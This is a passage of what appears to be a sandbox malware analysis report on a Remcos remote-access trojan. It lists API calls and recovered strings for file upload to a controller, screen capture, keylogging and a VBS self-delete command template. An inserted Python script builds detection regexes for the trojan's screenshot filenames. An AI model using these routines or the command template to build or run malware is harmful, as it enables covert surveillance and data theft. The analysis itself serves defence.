                                          • CreatePopupMenu.USER32 ref: 0041D6FC
                                          • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                          • String ID: Close
                                          • API String ID: 1657328048-3535843008
                                          • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                          • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                          • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                          • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$Info
                                          • String ID:
                                          • API String ID: 2509303402-0
                                          • Opcode ID: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                          • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                          • Opcode Fuzzy Hash: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                          • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
                                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                          • __aulldiv.LIBCMT ref: 00408D88
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                          • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                          • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                          • CloseHandle.KERNEL32(00000000), ref: 00408FE9
                                          • CloseHandle.KERNEL32(00000000), ref: 00409037
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                          • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                          • API String ID: 3086580692-2582957567
                                          • Opcode ID: 1eca58239539986b7f47a22af75df51a2b8eece64db44562e943364f676ba915
                                          • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                          • Opcode Fuzzy Hash: 1eca58239539986b7f47a22af75df51a2b8eece64db44562e943364f676ba915
                                          • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                          APIs
                                          • ___free_lconv_mon.LIBCMT ref: 0045138A
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                          • _free.LIBCMT ref: 0045137F
                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                          • _free.LIBCMT ref: 004513A1
                                          • _free.LIBCMT ref: 004513B6
                                          • _free.LIBCMT ref: 004513C1
                                          • _free.LIBCMT ref: 004513E3
                                          • _free.LIBCMT ref: 004513F6
                                          • _free.LIBCMT ref: 00451404
                                          • _free.LIBCMT ref: 0045140F
                                          • _free.LIBCMT ref: 00451447
                                          • _free.LIBCMT ref: 0045144E
                                          • _free.LIBCMT ref: 0045146B
                                          • _free.LIBCMT ref: 00451483
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                          • String ID:
                                          • API String ID: 161543041-0
                                          • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                          • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                          • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                          • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                          APIs
                                          • ___free_lconv_mon.LIBCMT ref: 10007D06
                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                          • _free.LIBCMT ref: 10007CFB
                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                          • _free.LIBCMT ref: 10007D1D
                                          • _free.LIBCMT ref: 10007D32
                                          • _free.LIBCMT ref: 10007D3D
                                          • _free.LIBCMT ref: 10007D5F
                                          • _free.LIBCMT ref: 10007D72
                                          • _free.LIBCMT ref: 10007D80
                                          • _free.LIBCMT ref: 10007D8B
                                          • _free.LIBCMT ref: 10007DC3
                                          • _free.LIBCMT ref: 10007DCA
                                          • _free.LIBCMT ref: 10007DE7
                                          • _free.LIBCMT ref: 10007DFF
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                           • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                          • String ID:
                                          • API String ID: 161543041-0
                                          • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                          • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                          • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                          • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 0041A04A
                                          • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                          • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                          • GetLocalTime.KERNEL32(?), ref: 0041A196
                                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                          • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                          • API String ID: 489098229-1431523004
                                          • Opcode ID: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                          • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                          • Opcode Fuzzy Hash: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                          • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
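The screen-capture routine above (GdiplusStartup, CreateDirectoryW, GetLocalTime) names its output with the printf formats `wnd_%04i%02i%02i_%02i%02i%02i` and `time_%04i%02i%02i_%02i%02i%02i`. The following is an added Python example, not code from the report or from Remcos, that converts those formats into regular expressions and uses them to hunt for capture artefacts in a directory listing during incident response. The year, month, day, hour, minute, second field order, the tolerance of a trailing file extension and the sample file names are assumptions of this example; the report does not state them.

```python
import re
from datetime import datetime
from typing import List, Optional, Tuple

# printf-style formats recovered from the Remcos screen-capture routine (String ID above).
# Assumption: the six %i conversions are filled from GetLocalTime as year, month, day,
# hour, minute, second, in that order; the report only shows the format strings.
SCREEN_CAPTURE_FORMATS = {
    "window": "wnd_%04i%02i%02i_%02i%02i%02i",
    "timed": "time_%04i%02i%02i_%02i%02i%02i",
}

# One printf integer conversion: optional zero flag, optional width, conversion letter.
_CONV = re.compile(r"%(0?)(\d*)([diu])")


def printf_to_regex(fmt: str) -> "re.Pattern":
    """Turn a printf format that contains only integer conversions into an anchored regex.

    %0Ni becomes a capture group of exactly N digits (a minimum width in C, but exact for
    calendar fields); a bare %i becomes (\\d+). Literal text is escaped. An optional file
    extension is tolerated because the report does not show which one GDI+ writes."""
    parts, pos = [], 0
    for m in _CONV.finditer(fmt):
        parts.append(re.escape(fmt[pos:m.start()]))
        width = m.group(2)
        parts.append(r"(\d{%d})" % int(width) if width else r"(\d+)")
        pos = m.end()
    parts.append(re.escape(fmt[pos:]))
    return re.compile("^" + "".join(parts) + r"(?:\.[A-Za-z0-9]{1,4})?$")


_COMPILED = {kind: printf_to_regex(fmt) for kind, fmt in SCREEN_CAPTURE_FORMATS.items()}


def match_artifact(name: str) -> Optional[Tuple[str, datetime]]:
    """Return (kind, timestamp) if `name` has the shape of a Remcos capture file, else None.

    Digit runs of the right length that do not form a real calendar time (month 13,
    second 99) are rejected, which removes most accidental matches on unrelated files."""
    for kind, rx in _COMPILED.items():
        m = rx.match(name)
        if not m:
            continue
        try:
            return kind, datetime(*map(int, m.groups()))
        except ValueError:
            return None
    return None


def scan_names(names: List[str]) -> List[Tuple[str, str, datetime]]:
    """Filter a directory listing down to capture artefacts, oldest first."""
    hits = []
    for n in names:
        r = match_artifact(n)
        if r:
            hits.append((n, r[0], r[1]))
    hits.sort(key=lambda h: h[2])
    return hits


# Constructed directory listing for demonstration; not taken from the sandbox run.
SAMPLE_NAMES = [
    "time_20240911_143500.jpg",
    "wnd_20240911_143005.jpg",
    "wnd_20241399_000000.jpg",   # right shape, but month 13: rejected
    "report.docx",
    "wnd_2024091_143005.jpg",    # one digit short: rejected
]

if __name__ == "__main__":
    for name, kind, ts in scan_names(SAMPLE_NAMES):
        print(f"{ts:%Y-%m-%d %H:%M:%S}  {kind:7}  {name}")
```

Running the scan over the capture directory of an affected host gives a timeline of when the RAT was taking screenshots, which can be correlated with the idle markers in the keylog.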
                                          APIs
                                          • Sleep.KERNEL32(00001388), ref: 0040A77B
                                            • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                            • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                            • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                            • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                          • String ID: 8SG$8SG$;p$PG$PG
                                          • API String ID: 3795512280-80952659
                                          • Opcode ID: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                          • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                          • Opcode Fuzzy Hash: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                          • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                                          APIs
                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                            • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                            • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                                            • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                          • ExitProcess.KERNEL32 ref: 0040D9FF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                          • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                          • API String ID: 1913171305-3159800282
                                          • Opcode ID: 8db7f9089fcdac6088c6dca5af5b566ceab7d3a4e33a82e448366c6afc64066d
                                          • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                          • Opcode Fuzzy Hash: 8db7f9089fcdac6088c6dca5af5b566ceab7d3a4e33a82e448366c6afc64066d
                                          • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                          • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                          • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                          • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                          APIs
                                            • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000), ref: 00455946
                                          • GetLastError.KERNEL32 ref: 00455D6F
                                          • __dosmaperr.LIBCMT ref: 00455D76
                                          • GetFileType.KERNEL32 ref: 00455D82
                                          • GetLastError.KERNEL32 ref: 00455D8C
                                          • __dosmaperr.LIBCMT ref: 00455D95
                                          • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                          • CloseHandle.KERNEL32(?), ref: 00455EFF
                                          • GetLastError.KERNEL32 ref: 00455F31
                                          • __dosmaperr.LIBCMT ref: 00455F38
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                          • String ID: H
                                          • API String ID: 4237864984-2852464175
                                          • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                          • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                          • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                          • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID: \&G$\&G$`&G
                                          • API String ID: 269201875-253610517
                                          • Opcode ID: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                                          • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                          • Opcode Fuzzy Hash: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                                          • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 65535$udp
                                          • API String ID: 0-1267037602
                                          • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                          • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                          • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                          • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 0040AD73
                                          • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                          • GetForegroundWindow.USER32 ref: 0040AD84
                                          • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                          • GetWindowTextW.USER32(00000000,00000000,00000000,00000001,00000000), ref: 0040ADC1
                                          • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                          • String ID: [${ User has been idle for $ minutes }$]
                                          • API String ID: 911427763-3954389425
                                          • Opcode ID: 48f1adaacdea2f975f01b8500f115fca2f5cc24c7704d57e661a1b5e6bda6b32
                                          • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                          • Opcode Fuzzy Hash: 48f1adaacdea2f975f01b8500f115fca2f5cc24c7704d57e661a1b5e6bda6b32
                                          • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                          • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                          • __dosmaperr.LIBCMT ref: 0043A926
                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                          • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                          • __dosmaperr.LIBCMT ref: 0043A963
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                          • __dosmaperr.LIBCMT ref: 0043A9B7
                                          • _free.LIBCMT ref: 0043A9C3
                                          • _free.LIBCMT ref: 0043A9CA
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                          • String ID:
                                          • API String ID: 2441525078-0
                                          • Opcode ID: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                          • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                          • Opcode Fuzzy Hash: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                          • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                          APIs
                                          • SetEvent.KERNEL32(?,?), ref: 004054BF
                                          • GetMessageA.USER32 ref: 0040556F
                                          • TranslateMessage.USER32(?), ref: 0040557E
                                          • DispatchMessageA.USER32(?), ref: 00405589
                                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                          • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                          • String ID: CloseChat$DisplayMessage$GetMessage
                                          • API String ID: 2956720200-749203953
                                          • Opcode ID: ae46a6569c745e6d1fd2afb5fc3760f956382d9b8c2f314a1c5e4999f61ed837
                                          • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                          • Opcode Fuzzy Hash: ae46a6569c745e6d1fd2afb5fc3760f956382d9b8c2f314a1c5e4999f61ed837
                                          • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
